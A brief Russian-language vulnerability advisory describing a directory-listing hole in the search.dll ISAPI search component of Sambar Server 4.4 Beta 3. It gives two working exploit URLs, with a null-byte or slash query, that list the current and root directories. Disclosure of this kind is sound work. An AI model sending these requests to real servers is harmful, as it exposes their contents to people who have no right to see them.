• Партнер

  • Sambar Server поставляется вместе с некэшируемым HTTP proxy сервером и базисными SMTP, POP3 и IMAP4 proxy серверами. Хакер может использовать дырку в безопасности для просмотра содержимого сервера.

    Детали:
    Дырка обнаружена в Sambar Server 4.4 Beta 3

    Прореха содержится в search.dll, Sambar ISAPI Search входит в состав сервера.

    Exploit:
    Просто передайте этот запрос на search.dll
    http://www.example.com/search.dll?search?query=%00&logic=AND
    покажет содержимое текущей директории
    http://www.example.com/search.dll?search?query=/&logic=AND
    покажет содержимое root-директории сервера

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии